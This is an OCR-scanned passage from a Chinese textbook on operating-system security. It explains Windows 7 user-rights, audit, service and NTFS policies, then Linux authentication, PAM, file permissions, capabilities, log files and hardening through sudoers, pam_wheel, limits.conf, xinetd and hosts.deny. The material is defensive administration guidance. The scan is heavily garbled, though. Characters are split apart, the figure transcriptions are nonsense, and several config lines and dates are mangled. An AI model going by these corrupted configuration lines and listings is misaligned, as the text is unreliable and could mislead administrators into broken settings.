(3) 设置 “允许 通过 远程 桌面 服务 登录 ”的 账号 和 组 : 只 允许 管理 员 组 和 远程 桌面 用 
户 组 。 

(4) 设置 “允许 取得 文件 或 其 他 对 象 的 所 有 权 ” 的 账号 和 组 : 只 允许 管理 员 组 。 

(5) 设置 “允许 远程 关机 ”的 账号 和 组 : 只 允许 管理 员 组 。 

(6) 设置 “允许 关闭 系统 ”的 账号 和 组 : 只 允许 管理 员 组 。 

(7) 设置 “允许 本 地 登录 ”的 账号 和 组 : 根据 用 户 需 求 可 以 自由 定制 ,管理 员 通 常 应 
该 允许 本 地 登录 。 
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安全 设置 


AdministratorsBackup Operators 
Administrators 
LOCAL SERVICENETWORK SERVICEAdministrat- 


Administrators 


Administrators Users 
JSJO01\yangyang 

Administrators 

LOCAL SERVICEAdministratorsUsers 
LOCAL SERVICEAdministrators 
Administrators 

Administrators 

Administrators, Backup Operators 
Administrators 


Guest 
Guest 


Administrators 
Administrators,NT SERVICE\WdiServiceHost 
































E20 了 OCAL SERVICENETWORK SERVICEAd-- 
四 身份 验证 后 模拟 客户 映 LOCAL SERVICENETWORK SERVICEAdministrat- 
已 生 成 安全 审核 LOCAL SERVICE NETWORK SERVICE 

己 锁 定 内 存 页 





图 12-15 账号 权限 分 配 策略 
5. 计算 机 安全 选项 
该 策略 主要 包含 网 络 访问 和 交互 式 登录 两 部 分 ,也 通过 “本 地 安全 策略 ”一 “本 地 策 
上 略 ”>“ 安 全 选项 ”设置 ,如 图 12-16 所 示 。 常 用 的 安全 策略 如 下 。 





和 安全 设置 E 去 全 设置 
没有 定义 











12-16 ”计算 机 安全 选项 示例 





(1)“ 启 用 ”交互 式 登录 时 不 显示 最 后 的 用 户 名 : 避免 攻击 者 发 现 账号 名 称 。 
(2) 设置 交互 式 登录 时 锁定 会 话 后 不 显示 用 户 信息 : 避免 账号 信息 泄露 。 
(3) 设置 网 络 访问 时 本 地 账户 的 共享 和 安全 模型 为 经 典 模式 : 远程 用 户 网 络 访问 主 
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机 时 ,要 求 输入 本 地 账号 名 称 和 密码 ,并 以 该 账号 的 权限 进行 访问 。 

(4)“ 启 用 ”不 允许 账户 的 匿名 枚 举 : 不 允许 远程 用 户 搜索 本 地 主机 的 账号 列表 。 

(5)“ 启 用 ”不 允许 账户 和 共享 的 匿名 枚 举 : 不 允许 远程 用 户 匿名 搜索 本 地 的 共享 文 
件 列表 。 

6. 计算 机 审核 策略 

审核 策略 用 于 记录 跟踪 系统 中 所 发 生 的 事件 ,并 把 事件 存 人 操作 系统 日 志 , 通 过 事件 
查看 器 可 以 查看 。 系 统 默认 并 未 开启 审核 策略 ,系统 可 以 跟踪 的 事件 主要 如 下 。 

(1) 账户 登录 事件 : 账户 登录 时 ,验证 密码 或 其 他 凭据 是 否 成 功 , 可 以 只 跟踪 成 功 或 
失败 的 事件 ,也 可 以 两 者 都 跟踪 ,该 策略 适用 于 实时 发 现 远程 弱 口令 攻击 。 

(2) 登录 事件 : 审核 账户 登录 成 功 或 失败 的 事件 ,以 及 从 系统 中 注销 的 事件 。 

(3) 账户 管理 : 审核 系统 增加 、 删 除 、 修 改 账户 信息 的 成 功 或 失败 事件 ,该 策略 适合 
于 检测 攻击 者 在 系统 中 增加 和 修改 用 户 。 

(4) 系统 事件 : 审核 更 改 系 统 时 间 、 启 动 或 关闭 系统 、 加 载 其 他 身份 验证 组 件 、 系 统 
审核 事件 丢失 ,系统 审核 日 志 超出 阔 值 等 事件 。 

(5) 特权 使 用 : 记录 用 户 执行 某 些 特权 操作 时 的 成 功 或 失败 事件 。 

(6) 目录 服务 访问 : 审核 所 有 访问 活动 目录 对 象 的 成 功 和 失败 事件 。 

(7) 对 象 访问 : 审核 所 有 对 非 活动 目录 对 象 访问 的 成 功 和 失败 事件 ,包括 文件 和 目 
录 的 增加 ,修改 、 删 除 等 ,该 审核 策略 开启 会 增加 许多 事件 日 志 。 

(8) 进程 跟踪 : 审核 与 进程 相关 的 成 功 和 失败 事件 ,如 进程 创建 、 进 程 终止 等 。 

(9) 策略 更 改 : 审核 系统 对 用 户 权限 分 配 策略 .审核 策略 .账户 号 策略 等 配置 的 修改 
成 功 和 失败 事件 。 

审核 策略 通过 “本 地 安全 策略 ”>“ 本 地 策略 ”>“ 审 核 策略 "设置 ,一 个 可 用 的 配置 策 
略 如 图 12-17 所 示 。 














文件 () 操作 (A) 查看 W) 帮助 (H) 
bisieL 天 














图 12-17 审核 策略 示例 


7. 端口 和 服务 策略 
Windows 系统 默认 开启 了 许多 端口 和 服务 ,而 其 中 很 多 并 不 是 系统 必需 的 服务 和 端 
口 ,为 了 减少 安全 隐患 ,管理 人 员 应 该 尽 可 能 关闭 不 必要 的 端口 和 服务 。 
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1) 禁用 不 必要 的 服务 


Windows 系统 的 许多 服务 都 曝 出 过 严重 漏洞 ,如 著名 的 IIS 和 终端 服务 等 ; 另外 ,后 
门 和 木马 也 可 能 以 服务 形式 运行 ,因此 需要 熟悉 各 个 系统 服务 的 作用 并 且 经 常 检查 服务 
列表 。 对 于 不 需要 使 用 的 服务 程序 ,应 该 全 面 禁 止 ,以 增加 性 能 和 提高 安全 性 ,但 是 禁用 
服务 之 前 必须 检查 服务 之 间 的 依赖 关系 ,避免 关闭 某 个 服务 影响 到 其 他 服务 的 正常 运转 。 

系统 服务 列表 可 以 有 两 种 方式 查看 ,一 是 在 命令 行 执行 “services. msc”, 二 是 从 “控制 
面板 ”管理 工具 ”一 服务 ”组件 中 查看 。 可 以 禁用 的 Windows 系统 服务 如 下 。 

(1) Background Intelligent Transfer Service( 图 12-18): 使 用 闲置 的 网 络 带 宽 传 输 
数据 ,通常 不 需要 。 














ES e 后 还 状态 启动 党 型 。 本 录 为 
名 360 杀 壳 实时 防护 加 最 务 本 服务 只 用 于 加 载 360 亲 者 奖 时 防护 ,请 确保 生动 本 地 到 统 
信 ActiveX Installer (AxdnstSV) 为 从 Internet 安装 ActiveX 控件 提供 用 户 幅 .… 手动 本 地 系统 
GAdaptive Brightness 监 珊 气 用 光 伟 生路， 以 检测 所有 光 的 变化 并 调 手动 地 地 服务 
Adobe Acrobat Update Service Adobe Acrobat Updater keeps your Ado.. 3 动 二 地 系统 
Adobe Flash Player Update Service 此 服务 可 使 乱 安装 的 Adobe Flash Player 能 动 本 地 系统 
Application Experience 在 应 用 得 序 启动 和 为 应 用 得 序 处 理 示 用 得 序 燕 .。 已 启动 手动 本 地 系统 
GApplication Identity 确定 并 验证 应 用 得 序 的 村 禁用 此 服务 插 阻 反动 本 地 服务 
Application Information 信用 畏 且 管理 权限 便于 交互 式 应 用 得 序 的 运行 .。 已 启动 日 动 二 地 系统 
Application Layer Gateway service 为 Internet 连接 共享 提供 血 三 方 协议 播 件 的 大 动 本 地 服务 
侈 ASpNET 状 志 服 务 为 ASPJNET 提供 运程 外 会 活 状 术 均 持 . 知 果 .… 可 用 网 雹 服务 
Baidu Updater 百度 窗户 往生 动 更 新 服务 、 使 百度 的 升级 程序 手动 本 地 系统 
(Oh Base Fitering Engine 基本 衬 迁 引 元 (8F 是 一 种 管理 防火 增 和 Inter.。 已 启动 和 a 动 本 地 服务 
高 epMinipiupdate 生动 本 地 系统 
BingIMEUpdateService BingIMEUpdateService 了 手动 本 地 系统 
各 BitLocker Drive Encryption Service BDESVC 承载 BitLocker 下 动 吴 加 密 服 务 。B.- 手动 本 地 系统 
Block Level Backup Engine Service Windows 备份 使 用 WBENGINE 服务 执行 备 .- 手动 不 地 系统 
i Bluetooth Support service Bluetooth 服务 去 持 发 现 和 关联 运程 Bluetoo.。 已 启动 生动 本 地 服务 
六 Bonjour service 手动 本 地 系统 





图 12-18 部 分 服务 列表 


(2) BitLocker Driver Encryption Service: 用 于 BitLocker 组 件 的 服务 ,如 果 不 需 要 
加 密 驱 动 器 ,应 该 禁止 该 服务 。 

(3) Computer Browser: 用 于 在 网 络 上 将 自身 的 主机 信息 提供 给 其 他 主机 浏览 ,在 
网 络 共享 时 使 用 。 

(4) DHCP Client: 用 于 动态 获取 IP 地 址 ,如 果 系统 不 需要 DHCP 协议 ,那么 应 该 禁 
止 该 服务 。 

(5) Diagnostics Policy Service: 诊断 Windows 组 件 的 问题 检测 和 疑难 解答 ,几乎 难 
以 用 到 。 

(6) Diagnostics Tracking Service: 诊断 Windows 组 件 的 疑难 问题 时 用 于 收集 数据 ， 
几乎 难以 用 到 。 

(7) Encrypting File System(EFS) : 如 果 不 需要 对 系统 中 的 文件 加 密 , 则 不 需要 使 用 
该 服务 。 

(8) IKE and AuthIP IPSec Keying Modules: 用 于 IPSec 协议 的 IKE 交换 的 服务 ， 
如 果 系 统 不 需要 使 用 IPSec 协议 .该 服务 无 须 开启 。 

(9) IP Helper: 使 用 IPv6 转换 技术 和 IP-HTTPS 隧道 连接 ,通常 不 需要 该 服务 。 
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(10) IPSec Policy Agent: 用 于 IPSec 协议 ,如 果 系 统 不 需要 使 用 IPSec 协议 ,该 服务 
无 须 开启 。 

(11) Remote Desktop Services: 远程 桌面 服务 ,有 较 大 安全 隐患 ,如 不 需要 使 用 ,应 
该 禁止 该 服务 。 

(12) Server: 如 果 不 需要 将 自身 打印 机 文件 和 目录 共享 , 则 可 关闭 该 服务 。 

(13) TCP/IP NetBIOS Helper: 向 网 络 提供 NetBIOS 服务 ,几乎 不 需要 使 用 。 

(14) Themes: 如 果 对 桌面 主题 没 兴趣 , 则 可 以 禁用 该 服务 。 

(15) WallPaper Protection Service: 保护 墙纸 服务 ,几乎 不 需要 使 用 。 

(16) Workstation: 网 络 共享 的 客户 端 服 务 ,如 果 不 需要 使 用 Windows 网 络 共 享 访 
问 其 他 主机 ,可 以 关闭 该 服务 。 

2) 禁用 不 必要 的 端口 

用 户 应 该 根据 自身 的 需要 设置 主机 开放 的 端口 ,网 络 服务 与 端口 的 映射 关系 可 以 在 
文件 “C;\windows\system32\drivers\etc\services” 中 查找 。Windows 7 系统 无 法 在 网 络 
连接 的 TCP/IP 高 级 设置 中 进行 端口 筛选 ,而 是 统一 通过 防火 墙 进行 设置 。 当 然 , 禁 用 
端口 的 另 一 种 方式 就 是 禁用 相应 的 网 络 服务 。 常 用 端口 和 服务 的 映射 关系 如 表 12-3 
所 列 。 


表 12-3 常用 端口 和 网 络 服务 的 映射 关系 




















端 口 服 务 端口 服 务 
TCP 8080 常见 的 HTTP 代理 服务 | TCP 110 POP3 服务 
TCP 21/20 FTP 服务 TCP 55 DCOM 服务 
TCP 22 SSH 服务 UDP 137,138; TCP 139 | NetBIOS 名 字 服 务 
TCP 23 TELNET 服务 UDP 161 SNMP 服务 
TCP 25 SMTP 服务 TCP 3389 远程 桌面 服务 
TCP 80 HTTP 服务 TCP 445 Windows 共享 服务 














8. 文件 和 目录 安全 访问 策略 

Windows 7 系统 的 各 个 分 区 应 该 启用 NTFS 文件 系统 管理 各 个 文件 和 目录 ,因为 它 
相 比 FAT 文件 系统 有 更 高 的 安全 性 。NTFS 可 以 采用 强制 完整 性 级 别管 理 各 个 文件 和 
目录 ,并 采用 ACL 的 方式 针对 具体 对 象 为 不 同 用 户 和 组 设置 访问 权限 。NTFS 的 目录 权 
限 主要 包括 如 下 。 

(1) 读 取 : 允许 查看 所 有 子 目录 和 文件 ,包括 文件 属性 和 所 有 权 。 

(2) 写 人 : 允许 增加 子 目 录 和 文件 ,修改 目录 属性 、 权 限 和 所 有 权 。 

(3) 列 出 目录 : 在 读 取 权 限 的 基础 上 增加 了 目录 浏览 权限 。 

(4) 读 取 和 执行 : 与 列 出 目录 权限 相似 ,但 是 列 出 目录 权限 只 能 被 子 目 录 继 承 ,而 读 
取 和 执行 权限 不 仅 被 子 目 录 继 承 ,也 可 以 被 文件 继承 。 

(5) 修改 : 允许 删除 文件 和 子 目 录 。 

(6) 完全 控制 : 获得 上 述 所 有 权限 。 
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NTFS 的 权限 设置 首先 在 ACL 中 增加 或 删除 用 户 和 组 (图 12-19), 然 后 为 用 户 和 组 
设置 相应 的 权限 (图 12-20)。 设 置 权限 的 基本 原则 包括 以 下 几 点 。 



































图 12-20 NTFS 设置 各 个 用 户 的 访问 权限 


(1) 权限 最 大 化 : 用 户 对 某 个 对 象 的 NTFS 权限 追求 最 大 化 原则 ,最 后 权限 是 其 所 
有 可 获得 的 权限 的 总 和 。 

(2) 拒绝 权 优先 : 虽然 一 个 用 户 的 权限 是 其 所 获得 的 权限 总 和 ,但 是 如 果 存 在 拒绝 
权限 , 则 拒绝 权限 将 覆盖 相应 的 允许 权限 。 

(3) 继承 原则 : 如 果 某 个 文件 或 目录 没有 设置 NTFS 权限 ,其 默认 权限 由 所 在 目录 
继承 而 来 。NTFS 有 两 个 有 关 继 承 关 系 的 操作 选项 。 

中 “包括 可 从 该 对 象 的 父 项 继承 的 权限 ?: 允许 父 项 的 继承 权限 传播 到 该 对 象 和 所 
有 子 对 象 。 选 择 该 项 即 上 一 级 目录 的 权限 将 被 本 对 象 继承 ,并 传递 到 本 对 象 的 子 对 象 ; 
否则 解除 本 对 象 和 上 一 级 目录 的 继承 关系 。 

@@“ 使 用 可 从 此 对 象 继承 的 权限 蔡 换 所 有 子 对 象 的 权限 ”: 选择 该 项 即 强行 将 本 对 
象 当 前 的 所 有 权限 施加 给 所 有 子 目录 和 文件 ,否则 按 正 常 继承 关系 分 配 权限 。 

除了 上 述 常 用 通用 策略 以 外 ,还 有 许多 安全 定制 策略 可 以 通过 Windows 系统 提供 的 
组 策略 编辑 器 “gpedit. msc" 进 行 设置 ,如 禁止 移动 设备 自动 播放 .设置 开机 和 登录 脚本 等 
功能 ,请 读者 自行 参阅 有 关 资 料 。 
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12.2.3 Linux 安全 机 制 


Linux 是 免费 使 用 和 自由 传播 的 类 UNIX 操作 系统 , 它 提供 的 安全 机 制 主要 包括 身 
份 标识 与 鉴别 .文件 访问 控制 ,特权 管理 .安全 审计 等 。 

1. 身份 标识 与 鉴别 

Linux 系统 的 身份 标识 和 鉴别 是 基于 用 户 名 和 口令 实现 。 

(1) 用 户 使 用 “adduser” 脚 本 新 增 用户 账 号 时 (图 12-21) ,依据 预先 定义 的 模板 (/etc/ 
default/useradd 和 /etc/login. defs) 为 该 用 户 分 配 相 应 的 资源 ,将 用 户 有 关 信 息 存 储 在 文 
件 “/etc/passwd” 中 (图 12-22) ,口令 的 散 列 码 存 储 在 文件 








/etc/shadow” 中 。 


fguotest' 

Addtng new group “fguotest' (1662) ..， 设置 用 户 ID 和 给 名 
Adding new user “fguotest' (1664) with group “fguotest' ... 
Creattng hone dtrectory */home/fguotest’ ... 
Copying files fron */etc/skel’ ... 创建 主 目录 
Enter new UNIX password: 
Retype new UNIX password: 。 设置 密码 
passwd: password updated successfully 
Changtng the user tnformatton for fguotest 
Enter the new value, or press ENTER for the default 

Full Nane []: fguo test 

Room Nunber [] 用 广 信息 ， 保存 

Work Phone [ . 

renee EE 在 /etc/passwd 中 

other []: 
Is the information correct? [Y/n] y 
You have new natl tn /var/natl/root 





图 12-21 adduser 示例 


:~$ cat /etc/passwd 
root:/root:/bin/bash 
/Jusr/sbin: /usr/sbin/nologin 
:/usr/sbin/nologin 
usr/sbin/nologin 
ync: /bin: /bin/sync 
:60:ganes: /usr /ganes: /usr/sbin/nologin 
PHT 
lp: /var/spool/lpd: /usr/sbin/nologin 
ar /matl: /usr/sbin/nologtn 
ar/spool/news: /usr/sbin/nologin 
/var/spool/uucp: /usr/sbin/nologtn 
nologin 
/usr/sbin/nologtn 





图 12-22 /etc/passwd 文件 示例 


(2) 新 增 用 户 登 录 系 统 时 ,“getty” 进 程 要 求 用 户 输入 账号 名 ， 
要 求 用 户 输入 口令 ,接着 根据 “/etc/shadow” 中 的 信息 
正确 ,如 果 正 确 , 则 为 用 户 启 动 一 个 指定 的 shell. 

(3) 用 户 可 以 使 用 “passwd” 程 序 随时 修改 自己 的 口令 ,管理 员 可 以 修改 所 有 用 户 的 
口令 。 

Linux 为 每 个 用 户 提供 了 附加 的 PAM(Pluggable Authentication Modules) 身份 认 
证 机 制 , 它 是 一 套 共 享 库 , 用 于 提供 一 个 框架 和 一 套 编 程 接口 ,将 认证 工作 交 给 管理 员 。 
PAM 允许 管理 员 在 多 种 认证 方法 之 间 做 出 选择 ,能 够 改变 本 地 认证 方法 而 不 
编译 与 认证 相关 的 应 用 程序 。PAM 的 功能 包括 加 密 口令 (包括 DES 和 其 他 加 密 算法 )、 





i 激活 “login” 进 程 
:检测 用 户 的 账号 名 称 和 口令 是 否 
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对 用 户 进行 资源 限制 、 限制 用 户 在 指定 :时间 从 指定 地 点 登录 , 它 可 以 灵活 引入 更 有 效 的 认 
证 方法 如 指纹 识别 ,智能 卡 识 别 等 。 PAM 可 以 针对 用 户 执行 的 操作 提供 不 同 的 认证 配 
置 ,配置 信息 存储 在 “/etc/pam. d” 目 录 下 的 相应 配置 文件 中 (图 12-23)。 


root@ubuntu: /var /log# dir /etc/pam.d/ -F 
hfn common-session-noninteractive login ryunuser-l 
cron newusers [su 


cups other Sudo 


connon-account gnone-screensaver passwd systemd-user 
ommon-auth Ttghtdm polkit-1 untty 

ONOT Password) Ughtdm-autologin ppp 

onnon-sesston™ lightdm-greeter runuser 





图 12-23 PAM 模块 列表 


2. 文件 访问 控制 

Linux 对 文件 和 设备 的 访问 控制 通过 自主 访问 控制 (DAC) 实 现 , 机 制 如 下 。 

(1) 每 个 用 户 都 有 唯一 的 用 户 号 UID, 并 且 必 须 属于 一 个 或 多 个 用 户 组 ,每 个 组 也 有 
唯一 的 组 号 GID, 这 些 信息 在 执行 “adduser” 和 “addgroup” 时 ,如 果 用 户 没 有 明确 指定 ,由 
预定 义 模板 自动 设 定 。 

(2) 用 户 登 录 系统 并 获得 shell 后 ,立即 获得 对 应 的 UID 和 GID, 随 后 该 用 户 启动 的 
所 有 进程 和 创建 的 所 有 对 象 都 会 继承 该 UID 和 GID, 除 了 标记 为 “SETUID” 的 程序 
(图 12-24)。 









ootRubuntu: /home/fguo# ls -1 /usr/bin/sudo 
| rws[-xr-x 1 root root 159852 Mar 30 2616 NS 


:03 004Key.txt 
52 1.txt 
43 2.txt 


28 agent_key.txt 
读 、 写 和 执行 权限 ， 


分 细 对 应 创建 者 、 用 
用 户 





图 12-24 文件 访问 控制 示例 


(3) 每 个 文件 的 访问 主体 分 为 拥有 者 (U) 用户 组 (G) 和 其 他 用 户 (O) ,访问 权限 分 
为 读 (R) 、 写 (W) 和 执行 (X) 三 种 (图 12-24) ,对 于 系统 中 的 每 个 文件 ,允许 文件 的 拥有 者 
为 该 文件 指定 文件 的 拥有 者 和 用 户 组 ,并 设置 相应 的 访问 权限 。Linux 使 用 9b 表示 各 类 
用 户 的 访问 模式 ,0 表示 不 允许 ,1 表示 允许。 

(4) 当 用 户 或 进程 访问 文件 时 ,Linux 根据 进程 代表 的 用 户 和 用 户 组 以 及 在 文件 系 
统 中 存储 的 访问 控制 信息 决定 是 否 允许 访问 。 

3. 特权 管理 

Linux 继承 了 传统 UNIX 的 特权 管理 机 制 , 即 基于 超级 用 户 root 的 特权 管理 机 制 ， 
基本 思想 如 下 。 

(1) 普通 用 户 没有 任何 特权 ,而 超级 用 户 拥 有 系统 的 所 有 特权 。 

















yD/ 
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(2) 进程 需要 进行 特权 操作 时 ,系统 检测 进程 所 属 的 用 户 是 否 为 超级 用 户 以 决定 是 
否 允 许 执行 。 

(3) 当 普 通用 户 需要 执行 特权 操作 ,此 时 利用 SETUID 程序 将 用 户 临 时 升级 为 特权 
用 户 ,在 执行 特权 操作 之 后 ,再 降级 恢复 初始 权限 。 

这 种 机 制 虽然 方便 了 管理 和 维护 ,但 是 不 利于 系统 安全 。 一 旦 某 个 SETUID 程序 存 

在 安全 漏洞 ,攻击 者 可 以 利用 该 漏洞 获得 超级 用 户 权限 ,从 而 接管 系统 。 

因此 ,现在 的 Linux 内 核 引 入 了 能 力 (capability) 的 概念 ,实现 了 基于 能 力 的 特权 管 
理 机 制 , 该 机 制 的 基本 思想 是 : 

(1) 使 用 能 力 分 割 系统 的 所 有 特权 ,使 得 相似 的 敏感 操作 具 ee 

(2) 在 系统 启动 后 ,为 了 系统 安全 ,可 以 剥夺 超级 用 户 的 某 些 能 力 ,而 且 这 些 能 力 在 
系统 没有 重新 启动 之 前 不 允许 恢复 。 

(3) 进程 可 以 放弃 自己 的 某 些 能 力 ， 但 放弃 的 能 力 不 可 恢复 。 

(4) 进程 启动 时 拥有 的 能 力 是 所 属 用 户 的 能 力 和 父 进程 能 力 的 交集 。 

(5) 每 个 进程 的 能 力 由 32 位 整数 表示 , 某 位 为 1 表示 具备 某 种 能 力 , 即 最 多 具备 32 
Nema 

(6) 当 进 程 需要 特权 操作 时 ,系统 仅 检 测 进程 是 否 具备 相应 的 能 力 即 可 ,不 用 检测 用 
户 是 否 是 超级 用 户 。 

4. 安全 审计 

相 比 Windows,Linux 的 日 志 系 统 十 分 强大 ,几乎 所 有 系统 中 发 生 的 重要 事件 都 会 被 
记录 在 不 同 的 日 志文 件 中 。 不 同 版 本 的 Linux 的 系统 日 志文 件 名 字 可 能 有 所 不 同 , 但 是 
基本 上 都 存放 在 “/var/log” 目 录 中 ( 见 6.2.2 节 )。 以 Ubuntu 为 例 , 重 要 的 日 志文 件 如 
下 ?了 (图 12-25) 。 




















root@ubuntu: /var /log# dir -Fa 
/ auth.log.2.gz fsck/ mail. log.2.9z 
| bootstrap.log gpu-nanager.log 了 dtspatcher/ 
aide/ btmp hp/ 
alternatives.log 。 btmp.1 tnstaller/ 

“1 cups, 


g.2. upstart/ 
dpkg. log wtmp 

dpkg. log.1 / wtmp.1 

faillog nail. log Xorg.6.1og 
fontconftg.1og .log. Xorg.9.1og.old 


ps/ g 2. 
dtst-upgrade/ .1og Unattended- ades/ 
dmesg ke 2 





图 12-25 默认 系统 日 志 存放 目录 


(1) /var/log/alternatives. log: 记录 所 有 软件 的 更 新 蔡 代 信息 

(2) /var/log/apport. log: 记录 应 用 程序 崩溃 的 详细 日 志 。 

(3) /var/log/apt/history. log: 记录 apt-get 程序 安装 / 印 载 软件 历史 。 

(4) /var/log/apt/term. log: 记录 apt-get 程序 安装 / 印 载 每 个 软件 包 时 的 详细 信息 。 
(5) /var/log/auth. log: 记录 所 有 与 认证 有 关 的 信息 ,包括 PAM 认证 机 制 的 结果 。 
(6) /var/log/bootstrap. log: 记录 系统 启动 时 的 详细 信息 。 


DD http://www. linuxidc. com/Linux/2016-11/136837. htm。 
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(7) /var/log/btmp: 记录 所 有 失败 启动 的 信息 。 


(8) /var/log/cups/: 记录 所 有 与 打印 有 关 的 详细 信息 ,包括 access. log .error. log 和 
page_log 三 个 文件 。 
(9) /var/log/dmesg: 记录 内 核 缓冲 信息 , 即 在 系统 启动 时 显示 在 屏幕 的 硬件 有 关 


(10) /var/log/dpkg. log: 记录 使 用 dpkg 命令 安装 和 删除 软件 包 的 详细 日 志 信 息 。 
(11) /var/log/faillog: 记录 用 户 登 录 失败 信息 和 错误 登录 命令 。 
(12) /var/log/fontconfig. log: 记录 与 字体 配置 有 关 的 信息 。 
(13) /var/log/fsck: 记录 fsck 命令 的 执行 日 志 。 
(14) /var/log/kern. log: 记录 内 核 自 身 产生 的 日 志 信 息 , 用 于 分 析 定 制 内 核 时 出 现 
的 问题 。 

(15) /var/log/lastlog: 记录 所 有 用 户 的 最 近 登 录 信息 ,这 不 是 一 个 ASCII 文件 , 需 
要 用 lastlog 命令 查看 内 容 。 

(16) /var/log/lightdm/: 记录 X 图 形 界面 显示 器 的 有 关 日 志 信息 ,包括 lightdm 
, log、x-0-greeter. log 、x-0. log。 

(17) /var/log/mail. log: 记录 与 邮件 收发 有 关 的 日 志 信息 。 

(18) /var/log/unattended-upgrades: 记录 系统 自动 进行 的 安全 升级 信息 。 

(19) /var/log/wtmp: 永久 记录 每 个 用 户 登录 注销 及 系统 的 启动 和 关机 事件 ,用 来 
查看 用 户 的 登录 记录 ,last 命令 通过 访问 这 个 文件 获得 信息 。 

(20) /var/run/utmp: 记录 有 关 当 前 登录 的 每 个 用 户 的 信息 ,文件 内 容 随 着 用 户 登 
录 和 注销 系统 而 不 断 变化 , 它 只 保留 联机 用 户 的 记录 ,不 会 保留 永久 记录 ,系统 程序 如 
who、w、users,finger 等 就 需要 访问 这 个 文件 。 

(21) /var/log/Xorg. * .log: 记录 图 形 服务 器 X 的 有 关 日 志 信 息 。 

(22) /var/log/gpu-manager. log: 记录 与 GPU 配置 有 关 的 信息 。 

(23) /var/log/syslog: 记录 所 有 的 系统 事件 。 

管理 员 经 常 查看 这 些 日 志 信 息 , 有 助 于 及 时 发 现 攻击 者 的 攻击 行为 ,如 果 进 一 步 与 主 
机 入 侵 防 御 系 统 HIPS 相 结 合 ,实时 监测 这 些 日 志文 件 ,就 可 以 做 到 实时 阻止 攻击 。 


12.2.4 Linux 通用 安全 配置 


Linux 是 开源 软件 ,因此 网 络 上 存在 许多 开源 攻击 工具 可 以 攻击 Linux 系统 。 管 理 
员 需 要 仔细 地 设 定 各 种 系统 功能 ,再 加 上 必要 的 安全 措施 , 才 可 能 有 效 地 降低 安全 隐患 。 
Linux 的 通用 安全 配置 包括 账号 管理 .服务 和 端口 管理 .部 署 安全 工具 ,定期 安全 检查 和 
更 新 安全 补丁 等 。 

1. 账号 管理 

(1) 删除 不 需要 的 特殊 账号 : 系统 有 许多 预 置 账号 (图 12-22) ,如 果 没 有 使 用 ,必须 
删除 它们 。 这 些 没 有 安全 口令 的 账号 对 系统 的 安全 性 存在 威胁 .使 用 *deluser” 命 令 删除 
对 应 的 用 户 和 组 。 

(2) Linux 的 密码 复杂 性 设置 : 利用 PAM 机 制 , 首 先 需 要 安装 libpam_cracklib 库 ， 
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然后 在 “/etc/security/pwquality. conf” 文件 中 配置 密码 属性 ,接着 在 “/etc/pam. d/ 
common-password” 文 件 中 配置 ,增加 类 似 如 下 一 行 。 

// 只 能 试 5 次 ,最 小 长 度 8 字 符 ,密码 至 少 包 含 3 类 字符 

password requisite pam cracklib. so retry=5 minlen= 8 minclass=3 

(3) 限制 用 户 使 用 *su” 或 者 "sudo” 命 令 : 防止 管理 员 权 限 滥用 ,可 以 通过 PAM 机 制 
限制 *su” 的 使 用 ,而 “sudo” 的 使 用 通过 /etc/sudoers 进行 配置 。 

@ 在 /etc/sudoers 中 ,可 以 对 指定 用 户 或 组 设置 允许 执行 的 命令 序列 : 

// 用 户 组 fguo 只 允许 以 root 身份 执行 /usr/bin/ 和 /sbin/ 目 录 下 的 命令 

% fguo ALL = (root) /usr/bin/ * ,/sbin/* 

@ 在 /etc/pam. d/su 文 件 中 ,增加 下 面 一 行 , 即 可 限制 指定 组 或 者 管理 员 组 才 可 以 
使 用 su 命令 : 


auth required pam_wheel. so group = fguo ” // 不 指明 group 选项 , 即 指定 管理 员 组 才 可 以 使 用 su 


(4) 限制 用 户 的 系统 资源 上 限 : 在 /etc/security/limits. conf 中 限制 用 户 可 以 创建 的 
进程 数 . 用 户 的 最 大 同时 登录 数 、 可 使 用 的 内 存 大 小 等 。 例 如 ， 

fguo hard nproc 20 // 限 制 fguo 用 户 最 多 创建 20 个 进程 

@fguo hard as 500000 // 限 制 fguo 组 用 户 最 多 可 以 使 用 500MB 内 存 

2. 服务 和 端口 管理 

Linux 系统 的 默认 网 络 服务 通常 统一 在 /etc/xinetd. d/ 目 录 下 配置 ,使 用 超级 守护 进 
程 xinetd 管理 诸多 的 轻 量 级 网 络 服务 ,包括 标准 Internet 服务 如 Telnet、FTP 等 ,信息 服 
务 如 finger, 邮件 服务 如 imap 和 pop3, RPC 服务 如 rquotad 和 rusersd, BSD 服务 如 
login, 内 部 服务 如 chargen 和 echo 等 。 但 是 ,许多 不 必要 的 服务 存在 不 少 安全 隐患 ,因此 
需要 逐一 关闭 不 需要 的 服务 。 下 面 以 Telnet 服务 的 配置 文件 “/etc/xinetd. d/telnet” 为 
例 , 说 明 如 何 通过 xinetd 关闭 不 同 的 网 络 服务 : 


service telnet 


{ 


disable = yes // 禁 用 这 个 服务 

socket type= stream //TCP 服务 类 型 

wait= no // 不 需 等 待 ,服务 将 以 多 线程 的 方式 运行 
user = root // 执 行 此 服务 进程 的 用 户 是 root 


server = /usr/bin/telnetd  ”// 启 动 脚本 的 位 置 
log_on_failure += USERID  // 设 置 失败 时 ,UID 添加 到 系统 日 志 中 
} 
除了 通过 服务 关闭 端口 以 外 ,也 可 以 使 用 内 置 的 iptables 防火 墙 关闭 不 需要 的 端口 ， 
具体 设置 参见 第 7. 3. 3 节 ; 还 可 以 使 用 “/etc/hosts. allow” 和 “/etc/hosts. deny” 文 件 设 
置 允 许 访问 系统 的 主机 白 名 单 和 黑 名 单 , 例 如 可 以 在 hosts. deny 中 默认 拒绝 所 有 主机 访 
问 , 然 后 只 允许 hosts. allow 中 的 指定 主机 或 域名 访问 : 


hosts. deny: ALL:ALL // 第 一 个 ALL 表示 所 有 守护 进程 和 端口 ; 第 二 个 MLL 表示 所 有 主机 
hosts.allow: ALL: LOCAL，* .jxnu.edu.cn  // 只 人 允许 后 组 是 jxnu. edu. cn 的 主机 访问 本 机 
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3. 部 署 安 全 工具 

Ubuntu 官方 建议 ,为 了 系统 安全 应 该 部 署 一 些 常用 的 安全 工具 9 如 下 。 

(1) 配置 iptables 或 者 ufw 防火 墙 ; 

(2) 配置 AIDE 或 者 BitDefender 完整 性 检测 工具 ; 

(3) 配置 BastilleLinux 安全 强化 工具 ,用 于 加 固 系 统 ; 

(4) 配置 OPENSSH 和 VNC over SSH, 用 于 安全 远程 访问 ; 

(5) 配置 加 密 文件 系统 工具 ; 

(6) 配置 GPG 用 于 文件 和 邮件 加 密 ; 

(7) 配置 OPENSSL 工具 套件 用 于 安全 应 用 层 通 信 ; 

(8) 配置 Panda 反 病 毒 软件 。 

